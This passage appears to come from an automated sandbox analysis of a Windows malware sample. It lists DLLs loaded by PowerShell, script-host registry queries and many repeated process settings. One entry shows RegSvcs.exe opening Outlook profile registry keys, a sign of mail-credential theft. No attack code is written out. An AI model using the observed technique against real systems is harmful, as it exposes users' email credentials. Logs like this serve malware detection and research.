                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wer.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: aepic.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_06E3A9B5 push dword ptr [ecx+ecx-75h]; iretd 12_2_06E3A9BB
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
